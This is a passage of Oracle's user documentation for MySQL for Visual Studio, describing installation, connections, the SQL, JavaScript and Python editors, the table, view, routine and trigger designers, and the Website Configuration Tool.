This software and related documentation are provided under a license agreement containing restrictions on use and disclosure and are protected by intellectual property laws. Except as expressly permitted in your license agreement or allowed by law, you may not use, copy, reproduce, translate, broadcast, modify, license, transmit, distribute, exhibit, perform, publish, or display any part, in any form, or by any means. Reverse engineering, disassembly, or decompilation of this software, unless required by law for interoperability, is prohibited.
The information contained herein is subject to change without notice and is not warranted to be error-free. If you find any errors, please report them to us in writing.
If this is software or related documentation that is delivered to the U.S. Government or anyone licensing it on behalf of the U.S. Government, then the following notice is applicable:
U.S. GOVERNMENT END USERS: Oracle programs, including any operating system, integrated software, any programs installed on the hardware, and/or documentation, delivered to U.S. Government end users are "commercial computer software" pursuant to the applicable Federal Acquisition Regulation and agency-specific supplemental regulations. As such, use, duplication, disclosure, modification, and adaptation of the programs, including any operating system, integrated software, any programs installed on the hardware, and/or documentation, shall be subject to license terms and license restrictions applicable to the programs. No other rights are granted to the U.S. Government.
This software or hardware is developed for general use in a variety of information management applications. It is not developed or intended for use in any inherently dangerous applications, including applications that may create a risk of personal injury. If you use this software or hardware in dangerous applications, then you shall be responsible to take all appropriate fail-safe, backup, redundancy, and other measures to ensure its safe use. Oracle Corporation and its affiliates disclaim any liability for any damages caused by use of this software or hardware in dangerous applications.
Oracle and Java are registered trademarks of Oracle and/or its affiliates. Other names may be trademarks of their respective owners.
Intel and Intel Xeon are trademarks or registered trademarks of Intel Corporation. All SPARC trademarks are used under license and are trademarks or registered trademarks of SPARC International, Inc. AMD, Opteron, the AMD logo, and the AMD Opteron logo are trademarks or registered trademarks of Advanced Micro Devices. UNIX is a registered trademark of The Open Group.
This software or hardware and documentation may provide access to or information about content, products, and services from third parties. Oracle Corporation and its affiliates are not responsible for and expressly disclaim all warranties of any kind with respect to third-party content, products, and services unless otherwise set forth in an applicable agreement between you and Oracle. Oracle Corporation and its affiliates will not be responsible for any loss, costs, or damages incurred due to your access to or use of third-party content, products, or services, except as set forth in an applicable agreement between you and Oracle.
This documentation is NOT distributed under a GPL license. Use of this documentation is subject to the following terms:
You may create a printed copy of this documentation solely for your own personal use. Conversion to other formats is allowed as long as the actual content is not altered or edited in any way. You shall not publish or distribute this documentation in any form or on any media, except if you distribute the documentation in a manner similar to how Oracle disseminates it (that is, electronically for download on a Web site with the software) or on a CD-ROM or similar medium, provided however that the documentation is disseminated together with the software on the same medium. Any other use, such as any dissemination of printed copies or use of this documentation, in whole or in part, in another publication, requires the prior written consent from an authorized representative of Oracle. Oracle and/or its affiliates reserve any and all rights to this documentation not expressly granted above.
Access to Oracle Support
Oracle customers that have purchased support have access to electronic support through My Oracle Support. For information, visit http://www.oracle.com/pls/topic/lookup?ctx=acc&id=info or visit http://www.oracle.com/pls/topic/lookup?ctx=acc&id=trs if you are hearing impaired.
Chapter 1 General Information
Table of Contents
1.1 New in Version 2.0
1.2 New in Version 1.2
This chapter provides general information about MySQL for Visual Studio and how it has changed.
MySQL for Visual Studio provides access to MySQL objects and data from Visual Studio. As a Visual Studio package, MySQL for Visual Studio integrates directly into Server Explorer providing the ability to create new connections and work with MySQL database objects.
Functionality concepts include:
• **SQL Development**: By integrating directly into Visual Studio, database objects (tables, views, stored routines, triggers, indexes, etc) can be created, altered, or dropped directly inside Server Explorer.
Visual object editors include helpful information to guide you through the editing process. Standard data views are also available to help you view your data.
• **Query Designer**: Visual Studio’s query design tool is also directly supported. With this tool, you can query and view data from tables or views while also combining filters, group conditions, and parameters. Stored routines (both with and without parameters) can also be queried.
• **Stored Routine Debugging**: Use the full debugging support for stored routines. Using the standard Visual Studio environment and controls, you can set breakpoints, add watches, and step into, out of, and over routines and calls. Local variables can be added to the watch window and call stack navigation is also supported.
• **Entity Framework**: The Entity Framework is supported, to allow template based code generation and full support of the model designers and wizards.
For notes detailing the changes in each release, see the MySQL for Visual Studio Release Notes.
1.1 New in Version 2.0
This section summarizes many of the new features added to the 2.0 release series in relation to the MySQL for Visual Studio 1.2 release series. MySQL for Visual Studio 2.0.5 is a development release.
New features are described in the following sections:
• **Viewing MySQL Query Output**
• **Version Support for Visual Studio**
• **Switching Connections from Script and Code Editors**
• **Making a Connection**
• **MySQL Toolbar**
• **MySQL JavaScript and Python Code Editors**
For notes detailing the changes in each point release, see the MySQL for Visual Studio Release Notes.
**Viewing MySQL Query Output**
An output pane was added to the MySQL SQL, JavaScript, and Python editors to display information about each executed query. The output pane includes the information that previously appeared in the Messages tab.
**Figure 1.1 MySQL SQL Editor Output**

**Version Support for Visual Studio**
Beginning with MySQL for Visual Studio 2.0.5:
- Support for Microsoft Visual Studio 2017 was added.
- Support for Microsoft Visual Studio 2010 was removed.
**Switching Connections from Script and Code Editors**
A drop-down list was added to the toolbar of the SQL, JavaScript, and Python editors from which you can select a valid connection. JavaScript and Python editors show only the connections that support the X Protocol.
**Figure 1.2 Switching Connections**

**Making a Connection**
A new MySQL Connections Manager tool was added for creating and managing MySQL connections. It is opened from a button in the Server Explorer.
This button opens the **MySQL Connections Manager** dialog, which enables the sharing of stored MySQL connections with MySQL Workbench, if it is installed. MySQL connections are displayed in a simpler way and can be created and edited from within this dialog. These connections can be imported to the Visual Studio **Server Explorer** for use with Visual Studio.
After opening the **MySQL Connections Manager**:
To add a new MySQL connection with the **MySQL Connections Manager**:
MySQL Toolbar
In the **Server Explorer**, and with MySQL Server 5.7, the MySQL connection context menu was changed to show options to create JavaScript or Python scripts, along with the existing SQL script option.
Figure 1.6 MySQL Toolbar: Create New Script
Select **JavaScript** or **Python** to launch the MySQL code editor for the selected language.
MySQL JavaScript and Python Code Editors
Use the code editor to write and execute JavaScript or Python queries with MySQL Server 5.7 and higher, or as before, use SQL queries.
Figure 1.7 MySQL Editor: Script Template
Select **MyJs Script** or **MyPy Script** to launch the MySQL code editor for the selected language.
Figure 1.8 MySQL Editor: JavaScript Code Editor
1.2 New in Version 1.2
This section summarizes many of the new features added to 1.2.x in relation to earlier versions of MySQL for Visual Studio.
For notes detailing the changes in each point release, see the MySQL for Visual Studio Release Notes.
Support for MySQL 8.0 Features
MySQL for Visual Studio 1.2.8 supports the MySQL 8.0 release series (requires MySQL Connector/NET 6.9.12, 6.10.7, or 8.0.11) including:
- MySQL data dictionary, which uses INFORMATION_SCHEMA tables rather than tables in the mysql database (see MySQL Data Dictionary).
- The caching_sha2_password authentication plugin introduced in MySQL 8.0 (see Caching SHA-2 Pluggable Authentication).
Version Support for Visual Studio
Beginning with MySQL for Visual Studio 1.2.7:
- Support for Microsoft Visual Studio 2017 was added.
- Support for Microsoft Visual Studio 2010 was removed.
**Item Templates versus Project Templates**
Beginning with MySQL for Visual Studio 1.2.5, the project templates used to create MySQL Windows Forms and MySQL MVC projects are no longer available; they were replaced with MySQL Project Items:
- **MySQL MVC Item** replaces *MySQL MVC Project*.
- **MySQL Windows Forms Item** replaces *Windows Form Project*.
These item templates offer the benefit of adding new Windows Forms or MVC controllers/views connected to MySQL to existing projects, based on MySQL Entity Framework models, without the need to create an entirely new MySQL project.
In addition, item templates better follow the Visual Studio template standards, which are oriented toward creating projects regardless of database connectivity.
For information about using Item Templates, see *Chapter 7, MySQL Project Items*.
Chapter 2 Installing MySQL for Visual Studio
MySQL for Visual Studio is an add-on for Microsoft Visual Studio that simplifies the development of applications using data stored by the MySQL RDBMS. Many MySQL features also require that MySQL Connector/NET be installed on the same host where you perform Visual Studio development. Connector/NET is a separate product with several versions.
The options for installing MySQL for Visual Studio are:
• Using MySQL Installer (preferred): Download and execute the MySQL Installer.
With this option you can download and install MySQL Server, MySQL for Visual Studio, and Connector/NET together from the same software package, based on the server version. Initially, MySQL Installer assists you by evaluating the software prerequisites needed for the installation. Thereafter, MySQL Installer enables you to keep your installed products updated or to easily add and remove related MySQL products.
For additional information about using MySQL Installer with MySQL products, see MySQL Installer for Windows.
• Using the standalone Zip or MSI file: This option is ideal if you have MySQL Server and Connector/NET installed already. Use the information in this section to determine which version of MySQL for Visual Studio to install.
Minimum Requirements
MySQL for Visual Studio 1.2.8 is compatible with Connector/NET 6.9.12, 6.10.7 and 8.0.11. Previous Connector/NET versions are not supported by this release.
MySQL for Visual Studio operates with several versions of Visual Studio, although the extent of support is based on your installed versions of Connector/NET and Visual Studio. MySQL for Visual Studio no longer supports Visual Studio 2010 or 2008. Minimum requirements for the supported versions of Visual Studio are as follows:
• Visual Studio 2017 (Community, Professional, and Enterprise):
MySQL for Visual Studio 1.2.7 or 2.0.5 with Connector/NET 6.9.8
• Visual Studio 2015 (Community, Professional, and Enterprise):
MySQL for Visual Studio 1.2.7 or 2.0.2 with Connector/NET 6.9.8
• Visual Studio 2013 (Professional, Premium, Ultimate):
• .NET Framework 4.5.2 (install first).
• MySQL for Visual Studio 1.2.1 or 2.0.0 with Connector/NET 6.9.8
• Visual Studio 2012 (Professional, Test Professional, Premium, Ultimate):
• .NET Framework 4.5.2 (install first).
• MySQL for Visual Studio 1.2.1 or 2.0.0 with Connector/NET 6.9.8
MySQL for Visual Studio does not support Express versions of Microsoft development products, including Visual Studio and Microsoft Visual Web Developer. To use Connector/NET with Express versions of Microsoft development products, use Connector/NET 6.9 or later, without installing MySQL for Visual Studio.
The following table shows the support information for MySQL for Visual Studio.
### Table 2.1 Support Information for Companion Products
<table>
<thead>
<tr>
<th>MySQL for Visual Studio Version</th>
<th>MySQL Connector/NET Version Supported</th>
<th>Visual Studio Version Supported</th>
<th>MySQL Server Versions Supported</th>
<th>Notes</th>
</tr>
</thead>
<tbody>
<tr>
<td>2.0</td>
<td>8.0, 6.10, 6.9</td>
<td>2017, 2015, 2013, 2012</td>
<td>5.7, 5.6, 5.5</td>
<td>Enables MySQL Connections Manager and code editors (with MySQL 5.7).</td>
</tr>
<tr>
<td>1.2</td>
<td>8.0, 6.10, 6.9</td>
<td>2017, 2015, 2013, 2012</td>
<td>8.0, 5.7, 5.6, 5.5</td>
<td>Support for MySQL 8.0 features requires MySQL for Visual Studio 1.2.8 or higher.</td>
</tr>
</tbody>
</table>
### MySQL Connector/NET Restrictions
MySQL for Visual Studio is closely tied to Connector/NET, but they are two separate products that can be used without one another. The following restrictions apply:
- MySQL for Visual Studio cannot be installed alongside Connector/NET 6.6 or earlier; those versions must be removed before installing MySQL for Visual Studio.
- The following MySQL for Visual Studio features require Connector/NET:
- The Entity Framework Designer
- The Website Configuration Tool
- Debugging Stored Procedures and Functions
- The DDL T4 Template Macro (to generate a database from an EF Model)
Chapter 3 The MySQL Toolbar
The optional MySQL toolbar includes MySQL specific functionality and links to external MySQL tools such as MySQL Workbench and MySQL Utilities. Additional actions are available from the context menu for each data connection.
After installing MySQL for Visual Studio, the MySQL toolbar is available by selecting View, Toolbars, MySQL from the main menu. To position the MySQL toolbar within Visual Studio, do the following:
1. From the main menu, click Tools and then Customize.
2. In the Toolbars tab, select MySQL to highlight it. The check box should have a check mark to indicate that the toolbar is visible.
3. Select a dock location from Modify Selection. For example, the following figure shows the MySQL toolbar in the Dock location: Left position. Other dock locations are Top, Right, and Bottom.
Figure 3.1 MySQL for Visual Studio Toolbar and Context Menu
The MySQL toolbar provides shortcuts to some of the main features of MySQL for Visual Studio:
- **MySQL Script Window**: Opens a new MySQL script window using the selected connection. All available MySQL connections are listed in a submenu that can be selected from the toolbar.
The MySQL script window supports the IntelliSense feature for easing MySQL script creation inside Visual Studio.
- **Debug MySQL Routine**: Starts a debugging session on a selected MySQL stored routine inside Visual Studio.
- **MySQL Data Export Tool**: Opens a new tabbed-window of the Data Export tool.
- **MySQL Workbench SQL Editor**: Opens a new Workbench with an SQL editor window using the current MySQL connection, if MySQL Workbench has been installed.
- **MySQL Utilities Console**: Opens a new console window for the MySQL Utilities tool, if it is installed.
Chapter 4 Making a Connection
- Connect Using Server Explorer
- Connect with SSL and the X Protocol
MySQL for Visual Studio enables you to create, modify, and delete connections to MySQL databases.
**Connect Using Server Explorer**
To create a connection to an existing MySQL database, perform the following steps:
1. Start Visual Studio and open the Server Explorer by clicking **View** and then **Server Explorer** from the main menu.
2. Right-click the Data Connections node and then click **Add Connection**.
3. From the Add Connection window, click **Change** to open the Change Data Source dialog, then do the following:
a. Select **MySQL Database** from the list of data sources. Alternatively, you can select `<other>`, if **MySQL Database** is absent.
b. Select **.NET Framework Data Provider for MySQL** as the data provider.
c. Click **OK** to return to the Add Connections dialog.
4. Type a value for each of the following connection settings:
- **Server name:**
For example, **localhost** if the MySQL server is installed on the local computer.
- **User name:**
The name of a valid MySQL database user account, such as **root**.
- **Password:**
The password of the user account specified previously. Optionally, click **Save my password** to avoid having to enter the password for each connection session.
- **Database name:**
A default schema name is required to open the connection. Select a name from the list.
You can also set the port used to connect to the MySQL server by clicking **Advanced**. To test the connection with the MySQL server, set the server host name, the user name, and the password, and then click **Test Connection**. If the test succeeds, a success confirmation dialog opens.
5. Click **OK** to create and store the new connection. The new connection with its tables, views, stored procedures, stored functions, and UDFs now appears within the Data Connections list of Server Explorer.
After the connection is successfully established, all settings are saved for future use. When you start Visual Studio for the next time, open the connection node in Server Explorer to establish a connection to the MySQL server again.
To modify or delete a connection, use the Server Explorer context menu for the corresponding node. You can modify any of the settings by overwriting the existing values with new ones. Note that a connection can be modified or deleted only while no active editor for its objects is open; otherwise, you may lose your data.
Connect with SSL and the X Protocol
Connections that use the X Protocol can be configured to use SSL with PEM files. To use SSL encryption, connections must be created using the MySQL Connections Manager included with MySQL for Visual Studio 2.0.3 (or later) or with MySQL Workbench.
**Note**
SSL must be enabled in the target MySQL server instance and the X Plugin must be installed to support connections using SSL encryption and the X Protocol.
To create a connection to a MySQL database using SSL encryption and the X Protocol, perform the following steps:
1. Click the MySQL button in Visual Studio Server Explorer to open the **MySQL Connections Manager** window.
2. Click **Add New Connection** to create a new connection.
3. In the **Parameters** tab, add the host name, port, user name and password, and a default schema. Click **Test Connection** to verify the connection information. The following figure shows an example of parameter values within this tab.

4. In the **SSL** tab, add a path to the SSL CA, SSL CERT, and SSL Key files within the SSL PEM area. Click **Test Connection** to verify the connection information. The next figure shows an example of SSL PEM values within this tab.
5. Click **OK** to save the connection and return to the **MySQL Connections Manager** window.
**Note**
You must close and then reopen **MySQL Connections Manager** to apply the default schema.
6. Double-click the new SSL connection to add it to Server Explorer (or select the connection and click **OK**). To open the JavaScript or Python code editor, right-click the connection in Server Explorer and then select an editor.
Chapter 5 Editing
This chapter covers making edits in MySQL for Visual Studio.
After you have established a connection, for example, using the Connect to MySQL toolbar button, you can use auto-completion as you type or by pressing Control + J. Depending on the context, the auto-completion dialog can show the list of available tables, table columns, or stored procedures (with the signature of the routine as a tooltip). Typing some characters before pressing Control + J filters the choices to those items starting with that prefix.
5.1 MySQL SQL Editor
The MySQL SQL Editor can be opened from the MySQL toolbar or by clicking File, New, and File from the Visual Studio main menu. This action displays the New File dialog.
Figure 5.1 MySQL SQL Editor - New File
From the **New File** dialog, select the MySQL template, select the **MySQL Script** document, and then click **Open**.
The MySQL SQL Editor is then displayed. You can now enter SQL code as required, or connect to a MySQL server. Click the **Connect to MySQL** button in the MySQL SQL Editor toolbar and enter the connection details into the **Connect to MySQL** dialog that is displayed: the server name, user ID, password, and database to connect to, or click the **Advanced** button to select other connection string options. Click the **Connect** button to connect to the MySQL server. To execute your SQL code against the server, click the **Run SQL** button on the toolbar.
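For example, once connected you might run a simple query to confirm the editor round-trip. The `world` sample database and its `city` table are used here only as stand-ins for whatever schema you connected to:

```sql
-- Hypothetical query; substitute a table from your own schema.
SELECT COUNT(*) AS row_count
FROM world.city
WHERE CountryCode = 'USA';
```

The result set appears in the **Results** tab as a grid, and timing details appear in the **MySQL Output** pane.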
**Figure 5.2 MySQL SQL Editor - Query**
The results from queries are displayed in the **Results** tab and relevant information appears in the **MySQL Output** pane. The previous example displays the query results within a Result Grid. You can also select the Field Types, Execution Plan, and Query Stats for an executed query.
### 5.2 Code Editors
This section explains how to make use of the code editors in MySQL for Visual Studio.
**Introduction**
MySQL for Visual Studio provides access to MySQL objects and data without forcing developers to leave Visual Studio. Designed and developed as a Visual Studio package, MySQL for Visual Studio integrates directly into Server Explorer, providing a seamless experience for setting up new connections and working with database objects.
The following MySQL for Visual Studio features are available as of version 2.0.2:
- JavaScript and Python code editors, where scripts in those languages can be executed to query data from a MySQL database.
- Better integration with the Server Explorer to open MySQL, JavaScript, and Python editors directly from a connected MySQL instance.
- A newer user interface for displaying query results, where different views are presented from result sets returned by a MySQL server, such as:
- Multiple tabs for each result set returned by an executed query.
- Results view, where the information can be seen in grid, tree, or text representation for JSON results.
- Field types view, where information about the columns of a result set is shown, such as names, data types, character sets, and more.
- Query statistics view, displaying information about the executed query such as execution times, processed rows, index and temporary tables usage, and more.
- Execution plan view, displaying an explanation of the query execution done internally by the MySQL server.
Getting Started
The minimum requirements are:
- MySQL for Visual Studio 2.0.5
- Visual Studio 2012
- MySQL 5.7.12 with X Plugin enabled (Code editors are not supported for use with MySQL 8.0 servers.)
To enable X Plugin for MySQL 5.7:
1. Open a command prompt and navigate to the folder with your MySQL binaries.
2. Invoke the `mysql` command-line client:
```
mysql -u user -p
```
3. Execute the following statement:
```
mysql> INSTALL PLUGIN mysqlx SONAME 'mysqlx.dll';
```
Important
The `mysql.session` user must exist before you can load X Plugin. `mysql.session` was added in MySQL 5.7.19. If your data dictionary was initialized using an earlier version you must run the `mysql_upgrade` procedure. If the upgrade is not run, X Plugin fails to start with the following error message:
There was an error when trying to access the server with user: mysql.session@localhost. Make sure the user is present in the server and that mysql_upgrade was ran after a server update.
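Conversely, after a successful installation you can confirm that X Plugin is loaded by querying the standard plugin metadata, for example:

```sql
-- A status of ACTIVE indicates X Plugin is ready for X Protocol connections.
SELECT PLUGIN_NAME, PLUGIN_STATUS
FROM INFORMATION_SCHEMA.PLUGINS
WHERE PLUGIN_NAME LIKE 'mysqlx%';
```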
Opening a Code Editor
Before opening a code editor that can run scripts against a MySQL server, a connection needs to be established:
1. Open the Server Explorer pane by clicking View.
2. Right-click the Data Connections node and select Add Connection.
3. In the Add Connection window, make sure the MySQL Data Provider is being used and fill in all the information.
Note
To enter the port number, click Advanced and set the Port among the list of connection properties.
4. Click Test Connection to ensure you have a valid connection, then click OK. The new connection with its tables, views, stored procedures, and functions now appears within the Data Connections list of Server Explorer.
5. Right-click the connection, select New MySQL Script, and then select the language of the editor (JavaScript or Python) to open a new MySQL script tab in Visual Studio.
To create a new editor for an existing MySQL connection, you only need to do the last step.
Using the Code Editor
An open editor includes a toolbar with the actions that can be executed. The first two buttons in the toolbar represent a way to connect or disconnect from a MySQL server. If the editor was opened from the Server Explorer, the connection will be already established for the new script tab.
The third button is the Run button. Clicking it executes the script contained in the editor window, and the results of the script execution are displayed in the lower area of the script tab.
5.3 Editing Tables
MySQL for Visual Studio contains a table editor, which enables the visual creation and modification of tables.
The Table Designer can be accessed through a mouse action on table-type node of Server Explorer. To create a new table, right-click the Tables node (under the connection node) and choose Create Table from the context-menu.
To modify an existing table, double-click the node of the table to modify, or right-click this node and choose the Design item from the context menu. Either of the commands opens the Table Designer.
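Saving a table from the Table Designer ultimately executes ordinary DDL against the server. As a sketch of the kind of statement it generates (the table and column names here are hypothetical, not something the designer mandates):

```sql
CREATE TABLE customer (
  customer_id INT NOT NULL AUTO_INCREMENT,  -- set via the primary key / auto-increment flags
  name VARCHAR(100) NOT NULL,               -- NOT NULL flag checked in the Columns grid
  created_at DATETIME DEFAULT CURRENT_TIMESTAMP,
  PRIMARY KEY (customer_id)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;    -- engine and charset set via table properties
```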
Table Designer consists of the following parts:
- **Columns Editor** - a data grid on top of the Table Designer. Use the Columns grid for column creation, modification, and deletion. For additional information, see Section 5.3.1, “Column Editor”.
- **Indexes/Keys** window - a window opened from the Table Designer menu to manage indexes.
- **Relationships** window - a window opened from the Table Designer menu to manage foreign keys.
- **Column Properties** panel - a panel near the bottom of the Table Designer. Use the Column Properties panel to set advanced column options.
• **Properties** window - a standard Visual Studio Properties window, where the properties of the edited table are displayed. Use the Properties window to set the table properties. To open, right-click on a table and select the **Properties** context-menu item.
Each of these areas is discussed in more detail in subsequent sections.
To save changes you have made in the Table Designer, press either **Save** or **Save All** on the Visual Studio main toolbar, or press **Control + S**. If you have not already named the table, you will be prompted to do so.
**Figure 5.4 Choose Table Name**

After the table is created, you can view it in the **Server Explorer**.
**Figure 5.5 Newly Created Table**

The Table Designer main menu lets you set a primary key column, edit relationships such as foreign keys, and create indexes.
**Figure 5.6 Table Designer Main Menu**

### 5.3.1 Column Editor
You can use the Column Editor to set or change the name, data type, default value, and other properties of a table column. Click a cell in the grid to set the focus to it; you can also move through the grid using the **Tab** and **Shift + Tab** keys.
To set or change the name, data type, default value and comment of a column, activate the appropriate cell and type the desired value.
To set or unset flag-type column properties (NOT NULL, auto incremented, flags), select or deselect the corresponding check boxes. Note that the set of column flags depends on its data type.
To reorder columns, index columns or foreign key columns in the Column Editor, select the whole column to reorder by clicking the selector column on the left of the column grid. Then move the column by using Control+Up (to move the column up) or Control+Down (to move the column down) keys.
To delete a column, select it by clicking the selector column on the left of the column grid, then press the Delete button on a keyboard.
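The same column operations can also be expressed directly in SQL. For example, on a hypothetical `customer` table, adding, modifying, and dropping columns would look like:

```sql
ALTER TABLE customer
  ADD COLUMN email VARCHAR(255) NULL COMMENT 'Contact address',  -- new column with a comment
  MODIFY COLUMN name VARCHAR(150) NOT NULL,                      -- change type and NOT NULL flag
  DROP COLUMN created_at;                                        -- remove an existing column
```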
5.3.2 Column Properties
The Column Properties tab can be used to set column options. In addition to the general column properties presented in the Column Editor, in the Column Properties tab you can set additional properties such as Character Set, Collation and Precision.
5.3.3 Table Properties
To bring up Table Properties select the table and right-click to activate the context menu. Select Properties. The Table Properties dockable window will be displayed.
The following properties are listed in the Table Properties window, and many are fully described in the SHOW TABLE STATUS MySQL documentation.
- **Auto Increment**: The next AUTO_INCREMENT value.
- **Average Row Length**: The AVG_ROW_LENGTH value.
- **Character Set**: The Charset value.
- **Collation**: The Collation value.
- **Comment**: Table comments.
- **Data Directory**: The directory used to store data files for this table.
- **Index Directory**: The directory used to store index files for this table.
- **Maximum Rows**: Value of the MAX_ROWS property.
- **Minimum Rows**: Value of the MIN_ROWS property.
- **Name**: Name of the table.
• **Row Format**: The `ROW_FORMAT` value.
• **Schema**: The schema this table belongs to.
• **Storage Engine**: The storage engine used by the table.
**Note**
In MySQL 5.5 and higher, the default storage engine for new tables is **InnoDB**. See *Introduction to InnoDB* for more information about the choice of storage engine, and considerations when converting existing tables to **InnoDB**.
The property **Schema** is read-only.
**Figure 5.9 Table Properties**
### 5.4 Editing Views
To create a new view, right-click the Views node under the connection node in Server Explorer. From the node's context menu, choose the **Create View** command. This command opens the SQL Editor.
You can then enter the SQL for your view, and then execute the statement.
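For example, a view definition you might enter and execute (the underlying `customer` table and its columns are hypothetical):

```sql
-- A simple view restricting the customer table to active rows.
CREATE VIEW active_customers AS
  SELECT customer_id, name
  FROM customer
  WHERE active = 1;
```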
To modify an existing view, double-click a node of the view to modify, or right-click this node and choose the Alter View command from a context menu. Either of the commands opens the SQL Editor.
All other view properties can be set in the Properties window. These properties are:
- **Catalog**: The TABLE_CATALOG.
- **Check Option**: Whether or not the WITH CHECK OPTION clause is present. For additional information, see The View WITH CHECK OPTION Clause.
- **Definer**: Creator of the object.
- **Definition**: Definition of the view.
- **Is Updatable**: Whether or not the view is Updatable. For additional information, see Updatable and Insertable Views.
- **Name**: The name of the view.
- **Schema**: The schema which owns the view.
- **Security Type**: The SQL SECURITY value. For additional information, see Access Control for Stored Programs and Views.
Some of these properties can have arbitrary text values; others accept values from a predefined set. In the latter case, set the desired value with the embedded combo box.
The properties *Is Updatable* and *Schema* are read-only.
To save changes you have made, use either *Save* or *Save All* buttons of the Visual Studio main toolbar, or press *Control + S*.
**Figure 5.11 View SQL Saved**

---
### 5.5 Editing Indexes
Index management is performed using the *Indexes/Keys* dialog.
To add an index, select *Table Designer, Indexes/Keys...* from the main menu, and click *Add* to add a new index. You can then set the index name, index kind, index type, and a set of index columns.
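The name, kind, type, and columns chosen in the dialog correspond to ordinary index DDL. An equivalent hand-written statement might look like this (the table and index names are hypothetical):

```sql
-- A secondary BTREE index on a single column of the customer table.
CREATE INDEX idx_customer_name ON customer (name) USING BTREE;
```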
5.6 Editing Foreign Keys
You manage foreign keys for InnoDB tables using the Foreign Key Relationships dialog.
To add a foreign key, select Table Designer, Relationships... from the main menu. This displays the Foreign Key Relationship dialog. Click Add. You can then set the foreign key name, referenced table name, foreign key columns, and actions upon update and delete.
To remove a foreign key, select it in the list box on the left, and click the Delete button.
To change foreign key settings, select the required foreign key in the list box on the left. The detailed information about the foreign key is displayed in the right hand panel. Change the desired values.
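The settings in the Foreign Key Relationships dialog map onto standard InnoDB foreign key DDL. A hypothetical example, with `orders` referencing `customer`:

```sql
ALTER TABLE orders
  ADD CONSTRAINT fk_orders_customer
  FOREIGN KEY (customer_id) REFERENCES customer (customer_id)
  ON UPDATE CASCADE    -- action upon update, as chosen in the dialog
  ON DELETE RESTRICT;  -- action upon delete
```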
5.7 Editing Stored Procedures and Functions
To create a new stored procedure, right-click the Stored Procedures node under the connection node in Server Explorer. From the node's context menu, choose the Create Routine command. This command opens the SQL Editor.
Figure 5.14 Edit Stored Procedure SQL
To create a new stored function, right-click the **Functions** node under the connection node in Server Explorer. From the node's context menu, choose the **Create Routine** command.
To modify an existing stored routine (procedure or function), double-click the node of the routine to modify, or right-click this node and choose the **Alter Routine** command from the context menu. Either of the commands opens the SQL Editor.
Routine properties can be viewed in the **Properties** window. These properties are:
- Body
- Catalog
- Comment
- Creation Time
- Data Access
- Definer
- Definition
- External Name
- External Language
- Is Deterministic
- Last Modified
- Name
- Parameter Style
- Returns
- Schema
- Security Type
- Specific Name
- SQL Mode
- SQL Path
- Type
Some of these properties can have arbitrary text values, others accept values from a predefined set. In both cases, these values cannot be set from the properties panel.
You can also set all the options directly in the SQL Editor, using the standard `CREATE PROCEDURE` or `CREATE FUNCTION` statement.
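For instance, a minimal procedure you could create directly in the SQL Editor (the `customer` table is hypothetical; depending on the client you use, a custom statement delimiter may be required around the routine body):

```sql
CREATE PROCEDURE count_customers (OUT total INT)
BEGIN
  -- Return the row count through the OUT parameter.
  SELECT COUNT(*) INTO total FROM customer;
END
```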
To save changes you have made, use either **Save** or **Save All** buttons of the Visual Studio main toolbar, or press **Control + S**.
5.8 Editing Triggers
To create a new trigger, right-click the node of the table in which to add the trigger. From the node's context menu, choose the Create Trigger command. This command opens the SQL Editor.
To modify an existing trigger, double-click the node of the trigger to modify, or right-click this node and choose the Alter Trigger command from the context menu. Either of the commands opens the SQL Editor.
To create or alter the trigger definition using SQL Editor, type the trigger statement in the SQL Editor using standard SQL.
Note
Enter only the trigger statement, that is, the part of the CREATE TRIGGER query that is placed after the FOR EACH ROW clause.
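For example, given a full trigger such as the following (table and column names are hypothetical), only the `SET` statement after the `FOR EACH ROW` clause would be typed into the editor:

```sql
CREATE TRIGGER customer_before_insert
BEFORE INSERT ON customer
FOR EACH ROW
  SET NEW.created_at = NOW();  -- this line is the trigger statement you enter
```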
All other trigger properties are set in the Properties window. These properties are:
- Definer
- Event Manipulation
- Name
• Timing
Some of these properties can have arbitrary text values, others accept values from a predefined set. In the latter case, set the desired value using the embedded combo box.
The properties **Event Table**, **Schema**, and **Server** in the Properties window are read-only.
To save changes you have made, use either **Save** or **Save All** buttons of the Visual Studio main toolbar, or press **Control + S**. Before changes are saved, you will be asked to confirm the execution of the corresponding SQL query in a confirmation dialog.
To observe the runtime behavior of a stored routine and debug any problems, use the Stored Procedure Debugger. For additional information, see Chapter 11, *Debugging Stored Procedures and Functions*.
Chapter 6 MySQL Website Configuration Tool
This MySQL for Visual Studio feature enables you to configure the Entity Framework, Membership, Role, Site Map, Personalization, Session State, and Profile Provider options without editing the configuration files. You set your configuration options within the tool, and the tool modifies your web.config file accordingly.
Note
Site Map and Personalization provider support requires MySQL Connector.NET 6.9.2 or higher and MySQL for Visual Studio 1.2.1 or higher.
The MySQL Website Configuration Tool appears as a small icon on the Solution Explorer toolbar in Visual Studio, as shown in the following figure.
Figure 6.1 MySQL Website Configuration Tool
Note
The MySQL Website Configuration Tool icon is only visible if a MySQL project is active and if Connector.NET is installed.
Clicking the Website Configuration Tool icon launches the wizard and displays the first step (Entity Framework), as the figure that follows shows.
Figure 6.2 MySQL Website Configuration Tool - Entity Framework
This allows you to configure your application to use Entity Framework 5 or 6 with MySQL as the database provider, adding the required references to the project and updating the configuration file accordingly.
Figure 6.3 MySQL Website Configuration Tool - Membership
Clicking **Next** takes you to the next screen, where you can enable a MySQL Membership Provider. In addition to the standard (advanced) "Membership" provider, there is also a "Simple Membership" provider. You can only choose one of these two membership providers.
Advanced Membership Provider
To use the more advanced "Membership" provider, select the "Use MySQL to manage my membership records" check box to enable this. You can now enter the name of the application that you are creating the configuration for. You can also enter a description for the application.
You can then click the **Edit...** button to launch the Connection String Editor:
**Figure 6.4 MySQL Website Configuration Tool - Connection String Editor**
Note
Defined connection strings are automatically loaded and available in this dialog, whether they were created manually in *web.config* or previously using this tool.
You can also ensure that the necessary schemas are created automatically for you by selecting the **Autogenerate Schema** check box. These schemas are used to store membership information. The database used for storage is the one specified in the connection string.
You can also ensure that exceptions generated by the application will be written to the Windows event log by selecting the **Write exceptions to event log** check box.
Clicking the **Advanced** button launches a dialog that enables you to set Membership Options. These options dictate such variables as password length required when a user signs up, whether the password is encrypted and whether the user can reset their password or not.
The "Simple Membership" provider is similar to the advanced version, but it includes less options. To enable, check the "Use MySQL to manage my simple membership records" check box.
**Note**
The "Simple Membership" option was added in MySQL for Visual Studio version 1.2.3.
Figure 6.6 MySQL Website Configuration Tool - Simple Membership
